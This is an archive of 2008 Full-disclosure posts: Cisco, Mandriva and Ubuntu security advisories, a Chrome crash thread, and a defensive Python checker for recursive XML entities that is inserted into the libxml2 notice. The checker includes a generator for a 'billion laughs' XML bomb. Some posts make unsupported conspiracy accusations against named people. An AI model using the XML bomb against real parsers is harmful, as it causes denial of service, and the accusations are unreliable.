CSCsq07867 - Memory corruption with traceback in SIP inspection code

CVSS Base Score - 7.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - None
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 6.4
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

CSCsq57091 - Memory corruption and traceback when inspecting malformed SIP packets

CVSS Base Score - 7.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - None
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 6.4
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

CSCsk60581 - Device reload possible when SIP inspection is enabled

CVSS Base Score - 7.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - None
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 6.4
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

CSCsq39315 - Traceback when processing malformed SIP requests

CVSS Base Score - 7.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - None
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 6.4
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

IPSec Client Authentication Processing Vulnerability

CSCso69942 - Traceback in Remote Access Authentication Code

CVSS Base Score - 6.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - Single
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 5.6
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

SSL VPN Memory Leak Vulnerability

CSCso66472 - Crypto memory leak causing Clientless SSL VPNs to hang

CVSS Base Score - 7.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - None
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 6.4
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

URI Processing Error Vulnerability in SSL VPNs

CSCsq19369 - URI Processing Error in Clientless SSL VPN connections

CVSS Base Score - 7.8
  Access Vector - Network
  Access Complexity - Low
  Authentication - None
  Confidentiality Impact - None
  Integrity Impact - None
  Availability Impact - Complete
CVSS Temporal Score - 6.4
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

Potential Information Disclosure in Clientless VPNs

CSCsq45636 - Potential Information Disclosure in Clientless SSL VPNs

CVSS Base Score - 7.1
  Access Vector - Network
  Access Complexity - Medium
  Authentication - None
  Confidentiality Impact - Complete
  Integrity Impact - None
  Availability Impact - None
CVSS Temporal Score - 5.9
  Exploitability - Functional
  Remediation Level - Official Fix
  Report Confidence - Confirmed

Impact
======

Successful exploitation of the Erroneous SIP Processing Vulnerabilities, IPSec Client Authentication Processing Vulnerability, SSL VPN Memory Leak Vulnerability, or URI Processing Error Vulnerability in SSL VPNs may result in
the device reloading. This can be repeatedly exploited and may lead to a denial of service attack.

The Potential Information Disclosure in Clientless SSL VPNs vulnerability may allow an attacker to obtain user and group credentials if the user interacts with a rogue system or document.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

The following table gives the first fixed software release of each vulnerability, per affected release train ("Not vulnerable" means the train is not affected by that bug):

Vulnerability (Bug ID)                                                              | 7.0            | 7.1            | 7.2            | 8.0            | 8.1
------------------------------------------------------------------------------------+----------------+----------------+----------------+----------------+---------------
Memory corruption with traceback in SIP inspection code (CSCsq07867)                | 7.0(7)15       | 7.1(2)70       | Not vulnerable | Not vulnerable | Not vulnerable
Memory corruption and traceback when inspecting malformed SIP packets (CSCsq57091)  | Not vulnerable | Not vulnerable | 7.2(4)7        | 8.0(3)20       | 8.1(1)8
Device reload possible when SIP inspection is enabled (CSCsk60581)                  | Not vulnerable | Not vulnerable | 7.2(3)18       | 8.0(3)8        | Not vulnerable
Traceback when processing malformed SIP requests (CSCsq39315)                       | 7.0(7)16       | 7.1(2)71       | Not vulnerable | Not vulnerable | Not vulnerable
Traceback in Remote Access Authentication Code (CSCso69942)                         | Not vulnerable | Not vulnerable | 7.2(4)2        | 8.0(3)14       | 8.1(1)4
Crypto memory leak causing Clientless SSL VPNs to hang (CSCso66472)                 | Not vulnerable | Not vulnerable | 7.2(4)2        | 8.0(3)14       | 8.1(1)4
HTTP Processing Error in Clientless SSL VPN connections (CSCsq19369)                | Not vulnerable | Not vulnerable | Not vulnerable | 8.0(3)15       | 8.1(1)5
Potential Information Disclosure in Clientless SSL VPNs (CSCsq45636)                | Not vulnerable | Not vulnerable | Not vulnerable | 8.0(3)16       | 8.1(1)6
------------------------------------------------------------------------------------+----------------+----------------+----------------+----------------+---------------
Recommended Release                                                                 | 7.0(7)16       | 7.1(2)72       | 7.2(4)9        | 8.0(4)         | 8.1(1)8

Fixed Cisco PIX software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/pix?psrtdcat20e2

Fixed Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/asa?psrtdcat20e2

Workarounds
===========

The following workarounds may help some customers mitigate these vulnerabilities. Additional mitigation techniques that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20080903-asa.shtml

Erroneous SIP Processing Vulnerabilities

SIP inspection should be disabled if it is not needed, and temporarily disabling the feature will mitigate the SIP processing vulnerabilities. SIP inspection can be disabled with the command no inspect sip.

IPSec Authentication Processing Vulnerability

Use strong group credentials for remote access VPN connections and do not give out the group credentials to end users.

SSL VPN Memory Leak Vulnerability and URI Processing Error Vulnerability in SSL VPNs

IPSec clients are not vulnerable to this issue and may be used in conjunction with strong group credentials until the device can be upgraded.

Potential Information Disclosure in Clientless SSL VPNs

Client based VPN connections are not vulnerable to the information disclosure vulnerability.
If you are running 8.0(3)15, 8.0(3)16, 8.1(1)4, or 8.1(1)5, you may safely use client based VPN connections as an alternative to clientless VPNs.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission.
Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac at cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

These vulnerabilities were reported to Cisco by customers that experienced these issues during normal operation of their equipment and through internal testing efforts.

Status of this Notice: FINAL

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080903-asa.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

  * cust-security-announce at cisco.com
  * first-bulletins at lists.first.org
  * bugtraq at securityfocus.com
  * vulnwatch at vulnwatch.org
  * cisco at spot.colorado.edu
  * cisco-nsp at puck.nether.net
  * full-disclosure at lists.grok.org.uk
  * comp.dcom.sys.cisco at newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+----------+--------------+-------------------------+
| Revision | Date         | Description             |
+----------+--------------+-------------------------+
| 1.0      | 2008-Sept-03 | Initial public release. |
+----------+--------------+-------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt

-----BEGIN PGP SIGNATURE-----

iD8DBQFIvsPo86n/Gc8U/uARAmOIAKCcTL2O+3w2mEm0GTe2mcnb0NZ5uQCdG9aV
ldazcXFRcGmkm4g38B67ezM=
=t2NV
-----END PGP SIGNATURE-----

From razishaban at gmail.com Wed Sep 3 18:54:29 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Wed, 3 Sep 2008 20:54:29 +0300
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <18911.1220457961@turing-police.cc.vt.edu>
References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> <18911.1220457961@turing-police.cc.vt.edu>
Message-ID: <2d792fb20809031054i14494a32te9186cff5ab4d875@mail.gmail.com>

On 9/3/08, Valdis.Kletnieks at vt.edu wrote:
...
> I'd place bets that whoever it is, they're on the RBN payroll...
...

If they really were the "biggest hacker", why on earth would they work for a large group that would merely dull their shine and take from their profits, etc. No, the "biggest hacker" works alone, because he, or she (zomg!), doesn't really need anyone else.

--
Razi

From xploitable at gmail.com Wed Sep 3 19:47:22 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Sep 2008 19:47:22 +0100
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <18911.1220457961@turing-police.cc.vt.edu>
References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> <18911.1220457961@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310809031147o3211bafdub8202bd5acc2198a@mail.gmail.com>

On Wed, Sep 3, 2008 at 5:06 PM, wrote:
> I'd place bets that whoever it is, they're on the RBN payroll...
>

I thought a high ranking security professional like yourself would stick to facts, not the latest disinformation handed out by so-called "trusted" security professionals. Marcus Sachs is good at it, Sans is good at it. We already know the CIA use Sans for it, http://www.securityfocus.com/brief/666. Yet you continue to hang out with them on #dshield on Freenode. You are being led up a garden path by power hungry folks feeding the media news about anything they can orchestrate to ramp up cyber security as a national security agenda item as the next administration is coming in so they can become more powerful in Washington, yet you still trust them.

Stop playing into the hands of these guys and have your own opinion about things, unless you two are part of the power hungry cyber security circle of folks who are trying to artificially ramp up and put in front of the media a common cyber enemy, as the next administration is coming in.

We will never forget the Youtube video... "How do we put it in front of the media and get their attention?" We can get Valdis to keep repeating an artificial common cyber enemy and have Valdis put random comments on the mailing lists?

We all know you hang out with the power hungries because I've idled on #dshield and seen you, and it wouldn't surprise me if you were at that particular speech Marcus Sachs did.

No one believes what you say anymore Valdis, you're part of the group who is trying to get the attention of the next administration as they are coming in and 100 days after the next president is in the White House.

The Youtube video says it all about what's going on in the world and everything that's wrong with it.
Don't be part of the corruption that's going on Valdis, don't be associated with the Marcus Sachs's of the world, you don't want to be that type of person, trust me it will get you into a lot of trouble when it comes to building the evidence of who is guilty for what false flags and who was involved in the ground work and propaganda building on the internet.

http://www.youtube.com/watch?v=FSUPTZVlkyU

From security at mandriva.com Wed Sep 3 20:14:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 03 Sep 2008 13:14:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:184 ] libtiff
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:184
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libtiff
Date    : September 3, 2008
Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Drew Yaro of the Apple Product Security Team reported multiple uses of uninitialized values in libtiff's LZW compression algorithm decoder. An attacker could create a carefully crafted LZW-encoded TIFF file that would cause an application linked to libtiff to crash or potentially execute arbitrary code (CVE-2008-2327).

The updated packages have been patched to prevent this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIvrMbmqjQ0CJFipgRAqv6AJ9eEBD7LXdc9E8dpYGimLzumWjvUgCgxA3+
gSpOlHU8sZnY2OoFJ9KzkMw=
=8p0b
-----END PGP SIGNATURE-----

From redb0ne at hush.com Wed Sep 3 20:01:55 2008
From: redb0ne at hush.com (redb0ne at hush.com)
Date: Wed, 03 Sep 2008 15:01:55 -0400
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
Message-ID: <20080903190158.944BF20047@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Wed, 03 Sep 2008 14:47:22 -0400 n3td3v wrote:
>On Wed, Sep 3, 2008 at 5:06 PM, wrote:
>> I'd place bets that whoever it is, they're on the RBN payroll...
>>
>
>I thought a high ranking security professional like yourself would stick to facts, not the latest disinformation handed out by so-called "trusted" security professionals. Marcus Sachs is good at it, Sans is good at it. We already know the CIA use Sans for it, http://www.securityfocus.com/brief/666. Yet you continue to hang out with them on #dshield on Freenode. You are being led up a garden path by power hungry folks feeding the media news about anything they can orchestrate to ramp up cyber security as a national security agenda item as the next administration is coming in so they can become more powerful in Washington, yet you still trust them.

I'd like to see you provide some proof that this is "disinformation" aside from your delusional theories.
There has been plenty of proof that RBN is a real threat, if you are going to try and call people out on spreading misinformation, then you need to be prepared to present a counter argument proving it is disinformation. Otherwise all you are doing is flapping your mouth off.

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 3.0

wpwEAQMCAAYFAki+3yIACgkQGwcl4JwqQeAHagP/aRprRXQYDWWL6tFJ4Ee+QywkG+dZ
GV0HdSOUNQGEGdUygvtjIXztlRZuNza0/eSdDwaxDKoM2POCjpcRXoOfikA419S8XrqA
L7gFcL5Xn5I/NFO0sIhH/Co4gtlGdxe6nLNzCNc+8BS4rnf77cSJNGINQpkAfwxsYfiY
WnZB+yo=
=i1Ep
-----END PGP SIGNATURE-----

From psy.echo at gmail.com Wed Sep 3 20:40:54 2008
From: psy.echo at gmail.com (Rishi Narang)
Date: Thu, 4 Sep 2008 01:10:54 +0530
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com>
References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com>
Message-ID: <10910496895.20080904011054@gmail.com>

Hi,

"Time" can definitely play a major role. There was a collision that occurred due to the fact that I took time to find the real break point in the code, search for a template and to publish at EvilFingers site before sending it to Google and other bugtraqs. Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs; there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) a couple of hours before I released it out at EvilFingers.

So, I would like to convey due credit to Mr. JanDeMooij as well for his posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, and thanks to Mr. Brennan for contacting me about the same.
--
Thanks & Regards,
Rishi Narang | Security Researcher
Founder, GREYHAT Insight
Key: 0x8D67A3A3 (www.greyhat.in/key.asc)
www.greyhat.in
... eschew obfuscation, espouse elucidation.

Wednesday, September 3, 2008, 5:43:40 AM, you wrote:

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi
> Narang
> Sent: Tuesday, September 02, 2008 7:51 PM
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] Google Chrome Browser Vulnerability

> Hi,

> ---------------------------------------------------
> Software:
> Google Chrome Browser 0.2.149.27

> Tested:
> Windows XP Professional SP3

> Result:
> Google Chrome Crashes with All Tabs

> Problem:
> An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It fails in dealing with the POP EBP instruction when pointed out by the EIP register at 0x01002FF4.
> Proof of Concept:
> http://evilfingers.com/advisory/google_chrome_poc.php

> Credit:
> Rishi Narang (psy.echo)
> www.greyhat.in
> www.evilfingers.com
> ---------------------------------------------------

From xploitable at gmail.com Wed Sep 3 20:48:31 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Sep 2008 20:48:31 +0100
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <20080903190158.944BF20047@smtp.hushmail.com>
References: <20080903190158.944BF20047@smtp.hushmail.com>
Message-ID: <4b6ee9310809031248y5c6d3412q1c57a81b548e45aa@mail.gmail.com>

On Wed, Sep 3, 2008 at 8:01 PM, wrote:
> On Wed, 03 Sep 2008 14:47:22 -0400 n3td3v wrote:
>>On Wed, Sep 3, 2008 at 5:06 PM, wrote:
>>> I'd place bets that whoever it is, they're on the RBN payroll...
>>>
>>
>>I thought a high ranking security professional like yourself would stick to facts, not the latest disinformation handed out by so-called "trusted" security professionals. Marcus Sachs is good at it, Sans is good at it. We already know the CIA use Sans for it, http://www.securityfocus.com/brief/666. Yet you continue to hang out with them on #dshield on Freenode. You are being led up a garden path by power hungry folks feeding the media news about anything they can orchestrate to ramp up cyber security as a national security agenda item as the next administration is coming in so they can become more powerful in Washington, yet you still trust them.
>
> I'd like to see you provide some proof that this is "disinformation" aside from your delusional theories.
>
> There has been plenty of proof that RBN is a real threat, if you are going to try and call people out on spreading misinformation, then you need to be prepared to present a counter argument proving it is disinformation. Otherwise all you are doing is flapping your mouth off.
>

The biggest hackers of the world are not in the RBN... this is disinformation.
He just made it up because it helps to sex things up to influence the next administration as it is coming in.

From security at mandriva.com Wed Sep 3 21:51:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 03 Sep 2008 14:51:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:185 ] python-django
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:185
http://www.mandriva.com/security/
_______________________________________________________________________

Package : python-django
Date    : September 3, 2008
Affected: 2007.1, 2008.0, 2008.1
_______________________________________________________________________

Problem Description:

A cross-site request forgery vulnerability was discovered in Django that, if exploited, could be used to perform unrequested deletion or modification of data. Updated versions of Django will now discard posts from users whose sessions have expired, so data will need to be re-entered in these cases.

The versions of Django shipping with Mandriva Linux have been updated to the latest patched versions that include the fix for this issue. In addition, they provide other bug fixes.
_______________________________________________________________________

References:

http://www.djangoproject.com/weblog/2008/sep/02/security/
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIvss9mqjQ0CJFipgRApXgAJ9E6UrB1O4xV2D86+2RlZhS1mhcVACgtbR3
HR8hGgsIZiYSS0cMszhWCx8=
=zGMS
-----END PGP SIGNATURE-----

From redb0ne at hush.com Wed Sep 3 21:39:45 2008
From: redb0ne at hush.com (redb0ne at hush.com)
Date: Wed, 03 Sep 2008 16:39:45 -0400
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
Message-ID: <20080903203947.5E15C11803C@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs; there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) a couple of hours before I released it out at EvilFingers.

This is an out of bounds memory read that crashes the browser. It is a major exaggeration to call this a vulnerability, especially considering this is a beta browser. Not that others haven't already said it, but people never seem to learn that a browser crash is a stability issue, not a security issue.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 3.0

wpwEAQMCAAYFAki+9g8ACgkQGwcl4JwqQeBgBgP/YGeDE2VtxDaxw4S81LadJc0GbCJo
BmkN5g+6VhimPxUwvLgGyYoyaJg+Ab/cPzDELLMfp6h9jV+14jLO+2NYMnM8/G236Xjd
sew1u81YXnKUjaDkX0clUT9K9sWkQ2kJwnH6ZbMncnSpTXBLISiXyhoDCvtrdeTI1y8t
9a2kAMc=
=ysci
-----END PGP SIGNATURE-----

From jerome.benoit at grenouille.com Wed Sep 3 23:39:20 2008
From: jerome.benoit at grenouille.com (Jerome Benoit)
Date: Thu, 4 Sep 2008 00:39:20 +0200
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com>
Message-ID: <20080904003920.d64a5495.jerome.benoit@grenouille.com>

On Mon, 01 Sep 2008 02:44:35 -0300, Fernando Gont wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Folks,
>
> We have published a revision of our IETF Internet-Draft about port randomization. It is available at:
> http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt
> (you can find the document in other fancy formats at:
> http://www.gont.com.ar/drafts/port-randomization/index.html)
>

Hi,

I'm still wondering how much overhead algorithm #3 and #4 add ... Has someone done some tests?

Cheers.

--
Jérôme Benoit aka fraggle
La Météo du Net - http://grenouille.com
OpenPGP Key ID : 9FE9161D
Key fingerprint : 9CA4 0249 AF57 A35B 34B3 AC15 FAA0 CB50 9FE9 161D
From kees at ubuntu.com Thu Sep 4 00:08:39 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 3 Sep 2008 16:08:39 -0700
Subject: [Full-disclosure] [USN-640-1] libxml2 vulnerability
Message-ID: <20080903230839.GH12962@outflux.net>

===========================================================
Ubuntu Security Notice USN-640-1             September 03, 2008
libxml2 vulnerability
CVE-2008-3281
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libxml2                         2.6.24.dfsg-1ubuntu1.2

Ubuntu 7.04:
  libxml2                         2.6.27.dfsg-1ubuntu3.2

Ubuntu 7.10:
  libxml2                         2.6.30.dfsg-2ubuntu1.2

Ubuntu 8.04 LTS:
  libxml2                         2.6.31.dfsg-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Andreas Solberg discovered that libxml2 did not handle recursive entities safely. If an application linked against libxml2 were made to process a specially crafted XML document, a remote attacker could exhaust the system's CPU resources, leading to a denial of service.
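To illustrate the recursive-entity condition this notice describes, here is an added, stdlib-only Python pre-check (written for this page; it is not code from the USN, Ubuntu or libxml2). It extracts the general entities declared in a document's internal DTD subset, walks the reference graph to flag self-referential entities, and sizes the full expansion arithmetically so an exponential chain is caught without being materialised; the sample documents are constructed.

```python
"""Pre-parse check for recursive or runaway XML entity expansion.

Added example for this page, not code from the USN, Ubuntu or libxml2. Only
general entities in the internal DTD subset (<!ENTITY name "value">) are
handled; external and parameter entities are out of scope.
"""
import re

ENTITY_DECL = re.compile(
    r'<!ENTITY\s+([A-Za-z_][\w.-]*)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_][\w.-]*);')
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}  # one char each, never recurse


class RecursiveEntity(Exception):
    """An entity's replacement text refers (transitively) back to itself."""


def parse_internal_entities(doc):
    """Return {name: replacement text} declared in doc's internal DTD subset."""
    start = doc.find("<!DOCTYPE")
    lb = doc.find("[", start) if start >= 0 else -1
    rb = doc.find("]>", lb) if lb >= 0 else -1
    if rb < 0:
        return {}
    entities = {}
    for m in ENTITY_DECL.finditer(doc[lb + 1:rb]):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        entities.setdefault(m.group(1), value)  # XML: the first declaration binds
    return entities


def analyse_entities(entities, max_expansion=1_000_000):
    """Return (recursive, expanded_chars) for an entity declaration map.

    recursive is the condition the notice says libxml2 mishandled.  The size
    is computed with memoisation so a "billion laughs" chain is sized
    arithmetically instead of materialised; counting stops once it passes
    max_expansion, so beyond the cap the figure is only a lower bound.
    """
    size, on_stack = {}, set()  # memoised lengths; names on the DFS stack

    def expanded_len(name):
        if name in size:
            return size[name]
        if name in on_stack:
            raise RecursiveEntity(name)
        if name not in entities:   # undeclared: nothing expands, count the literal
            return len(name) + 2
        on_stack.add(name)
        text, total, last = entities[name], 0, 0
        for m in ENTITY_REF.finditer(text):
            total += m.start() - last  # literal text before this reference
            ref = m.group(1)
            total += 1 if ref in PREDEFINED else expanded_len(ref)
            last = m.end()
            if total > max_expansion:
                break
        total += len(text) - last
        on_stack.discard(name)
        size[name] = total
        return total

    total = 0
    try:
        for name in entities:
            total += expanded_len(name)
            if total > max_expansion:
                break
    except (RecursiveEntity, RecursionError):
        # A chain deeper than the interpreter stack is rejected like a cycle.
        return True, total
    return False, total


def is_safe(doc, max_expansion=1_000_000):
    """True only if doc has no recursive entity and expands within the cap."""
    recursive, total = analyse_entities(parse_internal_entities(doc), max_expansion)
    return not recursive and total <= max_expansion


# Constructed sample documents (not real-world files).
RECURSIVE_DOC = """<!DOCTYPE r [
  <!ENTITY a "x&b;x">
  <!ENTITY b "y&a;y">
]>
<r>&a;</r>"""

BENIGN_DOC = """<!DOCTYPE note [
  <!ENTITY company "Example Corp &amp; Co.">
  <!ENTITY sig "Regards, &company;">
]>
<note>&sig;</note>"""


def billion_laughs(depth=6, fanout=10):
    """Build the classic exponential-entity document: lolN = fanout x lolN-1."""
    decls = ['  <!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        decls.append(f'  <!ENTITY lol{i} "{"&lol%d;" % (i - 1) * fanout}">')
    return "<!DOCTYPE lolz [\n" + "\n".join(decls) + f"\n]>\n<lolz>&lol{depth};</lolz>"
```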
